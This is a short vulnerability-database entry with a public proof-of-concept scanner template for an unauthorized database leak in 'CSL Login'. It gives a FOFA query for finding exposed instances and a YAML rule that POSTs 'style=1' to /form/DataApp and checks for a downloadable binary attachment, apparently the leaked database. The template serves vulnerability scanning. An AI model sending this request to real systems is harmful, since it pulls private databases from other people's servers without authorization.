csl-login-unauth-db-leak: CSL Login unauthorized DB Leak

Date: 2025-09-01 | Affected software: CSL Login | PoC: public

Vulnerability description

FOFA: "csl/login"

PoC code [public]

id: csl-login-unauth-db-leak

info:
  name: CSL Login unauthorized DB Leak
  author: xpoc
  severity: high
  verified: true
  description: |
    FOFA: "csl/login"
  reference:
    - https://nosec.org/home/detail/3032.html
  tags: essl,leak
  created: 2023/06/23

rules:
    r0:
        request:
            method: POST
            path: /form/DataApp
            body: style=1
        expression: |
          response.status == 200 && 
          response.headers["content-type"].contains("application/binary") && 
          response.body.bcontains(b"ZK") && 
          response.raw_header.bcontains(b"attachment")
expression: r0()
